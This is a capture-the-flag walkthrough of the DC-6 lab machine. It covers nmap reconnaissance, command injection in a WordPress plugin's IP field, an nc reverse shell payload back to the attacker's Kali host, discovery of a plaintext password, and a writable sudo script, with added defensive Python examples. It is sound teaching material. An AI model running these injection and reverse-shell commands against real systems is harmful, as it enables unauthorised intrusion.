```
root at kali in ~/DC6 $ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:c1:aa:ea brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.70/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1606sec preferred_lft 1606sec
    inet6 fe80::b67d:15bc:205b:2eb8/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
```
Host discovery
Scanning the subnet with Nmap turns up one target IP: 10.10.8.18
```
root at kali in ~/DC6 $ nmap -sn -T4 --min-rate 10000 10.10.8.0/24 -oN Nmap_IP_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-16 09:02 CST
Nmap scan report for 10.10.8.1
Host is up (0.00010s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.00011s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.18
Host is up (0.0012s latency).
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.00026s latency).
MAC Address: 00:50:56:F8:65:AC (VMware)
Nmap scan report for 10.10.8.70
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.44 seconds
```
Port scanning
Scan for open ports:
```
root at kali in ~/DC6 $ nmap -p- -sT -T4 --min-rate 10000 10.10.8.18 -oN Nmap_Port_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-16 09:03 CST
Nmap scan report for 10.10.8.18
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.38 seconds
```
```
root at kali in ~/DC6 $ nmap -p22,80 -sV -O -sT -T4 --min-rate 10000 10.10.8.18 -oN Nmap_Server_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-16 09:03 CST
Nmap scan report for 10.10.8.18
Host is up (0.00053s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.83 seconds
```
```
root at kali in ~/DC6 $ nmap --script=vuln -T4 --min-rate 10000 10.10.8.18 -oN Nmap_Vuln_Scan.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-16 09:04 CST
Nmap scan report for 10.10.8.18
Host is up (0.00064s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
| http-wordpress-users:
| Username found: admin
| Username found: graham
| Username found: mark
| Username found: sarah
| Username found: jens
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 35.43 seconds
```
```
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
```
A quick search shows that the Activity Monitor plugin has an RCE vulnerability. Click Tools and enter 127.0.0.256 || ls -l:
The input length is limited, but that doesn't matter: the limit is enforced in the front end, so just edit it away:
It executes! Running commands through the web page is too clumsy, so capture the request with Burp Suite and work from there.
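Why the front-end length limit was no obstacle, and what a real fix looks like, as an added example that is not the Activity Monitor plugin's code: a hypothetical Python stand-in for an "enter an IP address" tool handler, first in the injectable string-building form and then hardened to validate the value server-side and pass it as a single argv entry with no shell involved.

```python
import ipaddress
import re
import subprocess
from typing import List

# Added example, not the plugin's code: a hypothetical stand-in for an
# "enter an IP address" tool handler, first injectable, then hardened.

def build_cmdline_vulnerable(user_input: str) -> str:
    """The bug class above: input pasted into a shell string. With
    "127.0.0.256 || ls -l" the shell sees two commands, not one argument."""
    return "ping -c 1 " + user_input  # this string would be run with shell=True

LABEL_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?")

def is_hostname(value: str) -> bool:
    """DNS syntax only: letter/digit/hyphen labels, no leading or trailing
    hyphen, and a non-numeric last label (so 127.0.0.256 is not a hostname)."""
    if not 1 <= len(value) <= 253:
        return False
    labels = value.rstrip(".").split(".")
    return all(LABEL_RE.fullmatch(l) for l in labels) and not labels[-1].isdigit()

def validate_target(user_input: str) -> str:
    """Server-side allow-list: a literal IP address or a hostname, nothing else.
    A length limit in the browser is not validation; the server re-checks."""
    value = user_input.strip()
    try:
        return str(ipaddress.ip_address(value))  # also rejects 127.0.0.256
    except ValueError:
        pass
    if is_hostname(value):
        return value
    raise ValueError(f"not an IP address or hostname: {value!r}")

def accepts(user_input: str) -> bool:
    try:
        validate_target(user_input)
        return True
    except ValueError:
        return False

def build_argv_safe(user_input: str) -> List[str]:
    """argv list, no shell: ';', '|' and '||' would be passed as data inside one
    argument, never parsed as separators (and validation already rejects them)."""
    return ["ping", "-c", "1", validate_target(user_input)]

def run_ping(user_input: str) -> int:
    """Run it for real (needs a ping binary; the checks below do not call this)."""
    return subprocess.run(build_argv_safe(user_input), capture_output=True, timeout=10).returncode
```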
Check whether the target has nc:
It does, and it is nc.traditional, the build with the -e option. Awesome.
Start an nc listener on Kali and try a reverse connection:
```
127.0.0.1 ; nc 10.10.8.70 4444 -e /bin/bash
```
```
root at kali in ~/DC6 $ nc -lvvp 4444
listening on [any] 4444 ...
connect to [10.10.8.70] from wordy [10.10.8.18] 47836
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
OK, it connected. Upgrade the shell:
```
root at kali in ~/DC6 $ nc -lvvp 4444
listening on [any] 4444 ...
connect to [10.10.8.70] from wordy [10.10.8.18] 47836
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-6:/var/www/html/wp-admin$
```
Information gathering (2)
Enumerating the host by hand is tedious, so just use the LinEnum.sh script:
```
www-data@dc-6:/var/www/html/wp-admin$ cd /tmp
cd /tmp
www-data@dc-6:/tmp$ wget http://10.10.8.70/LinEnum.sh
wget http://10.10.8.70/LinEnum.sh
--2024-10-16 13:22:05--  http://10.10.8.70/LinEnum.sh
Connecting to 10.10.8.70:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh          100%[===================>]  45.54K  --.-KB/s    in 0s

www-data@dc-6:/tmp$ ls -alR /home/graham > graham_result.txt
ls -alR /home/graham > graham_result.txt
www-data@dc-6:/tmp$ cat graham_result.txt
cat graham_result.txt
/home/graham:
total 24
drwxr-xr-x 2 graham graham 4096 Apr 26  2019 .
drwxr-xr-x 6 root   root   4096 Apr 26  2019 ..
-rw------- 1 graham graham    5 Apr 26  2019 .bash_history
-rw-r--r-- 1 graham graham  220 Apr 24  2019 .bash_logout
-rw-r--r-- 1 graham graham 3526 Apr 24  2019 .bashrc
-rw-r--r-- 1 graham graham  675 Apr 24  2019 .profile

www-data@dc-6:/tmp$ ls -alR /home/mark > mark_result.txt
ls -alR /home/mark > mark_result.txt
www-data@dc-6:/tmp$ cat mark_result.txt
cat mark_result.txt
/home/mark:
total 28
drwxr-xr-x 3 mark mark 4096 Apr 26  2019 .
drwxr-xr-x 6 root root 4096 Apr 26  2019 ..
-rw------- 1 mark mark    5 Apr 26  2019 .bash_history
-rw-r--r-- 1 mark mark  220 Apr 24  2019 .bash_logout
-rw-r--r-- 1 mark mark 3526 Apr 24  2019 .bashrc
-rw-r--r-- 1 mark mark  675 Apr 24  2019 .profile
drwxr-xr-x 2 mark mark 4096 Apr 26  2019 stuff

/home/mark/stuff:
total 12
drwxr-xr-x 2 mark mark 4096 Apr 26  2019 .
drwxr-xr-x 3 mark mark 4096 Apr 26  2019 ..
-rw-r--r-- 1 mark mark  241 Apr 26  2019 things-to-do.txt
```
Oh, there is a things-to-do.txt. Take a look at it:
```
www-data@dc-6:/tmp$ cat /home/mark/stuff/things-to-do.txt
cat /home/mark/stuff/things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
```
SUDO privilege escalation (1)
Log in as graham over SSH:
```
root at kali in ~/DC6 $ ssh graham@10.10.8.18
The authenticity of host '10.10.8.18 (10.10.8.18)' can't be established.
ED25519 key fingerprint is SHA256:BiP2AT/3IPc02K9uqH+WQ7eaE/xcImEo/D1R6/0tjBw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.8.18' (ED25519) to the list of known hosts.
graham@10.10.8.18's password:
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
graham@dc-6:~$ id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)
```
```
graham@dc-6:/tmp$ ./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Wed 16 Oct 14:07:40 AEST 2024


### SYSTEM ##############################################
[-] Kernel information:
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux

......

[+] We can sudo without supplying a password!
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

[+] Possible sudo pwnage!
/home/jens/backups.sh

......
```
Aha, there is one command that sudo allows graham to run:
```
graham@dc-6:/tmp$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
graham@dc-6:/tmp$ ls -al /home/jens/backups.sh
-rwxrwxr-x 1 jens devs 50 Apr 26  2019 /home/jens/backups.sh
```
A quick look shows that backups.sh is writable by the devs group, and graham is a member of devs, so graham can change what sudo will run as jens.
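An added Python check for exactly this misconfiguration (my code, not from the original writeup): it parses sudo -l output like the one above and reports any sudo target that is group-writable, world-writable or not owned by root, plus whether the caller belongs to the file's group. The sample rule text is constructed from the output shown here, and the temporary demo file stands in for backups.sh.

```python
import os, re, stat, tempfile
from typing import Dict, List

# Added example, not from the original post: check "sudo -l" targets for the
# weakness found above, a script that people other than root can rewrite.
# Constructed from the sudo -l output in the writeup.
SAMPLE_SUDO_L = """\
User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
"""

# Matches '(runas) TAG: /path args, /path2' lines; other sudo -l lines are skipped.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text: str) -> List[Dict[str, object]]:
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags").replace(":", "").split()
        for cmd in m.group("cmds").split(","):
            exe = cmd.strip().split()[0]  # executable path before any arguments
            rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": exe})
    return rules

def writable_findings(path: str) -> List[str]:
    # Every way someone other than root could change what sudo will execute.
    # Group-writable plus membership in that group is exactly graham -> jens.
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing (dangling rule)"]
    findings = []
    if st.st_uid != 0:
        findings.append("owner is not root")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
        if st.st_gid in set(os.getgroups()) | {os.getgid()}:
            findings.append("current user is in the file's group")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings

def audit(text: str) -> Dict[str, List[str]]:
    # Map each sudo target path (the ALL keyword excluded) to its findings.
    return {r["cmd"]: writable_findings(r["cmd"]) for r in parse_sudo_l(text) if r["cmd"] != "ALL"}

def demo_file(mode: int) -> str:  # constructed stand-in for backups.sh
    fd, path = tempfile.mkstemp(prefix="backups-", suffix=".sh")
    os.close(fd)
    os.chmod(path, mode)  # e.g. 0o775 reproduces -rwxrwxr-x from the listing above
    return path
```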
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.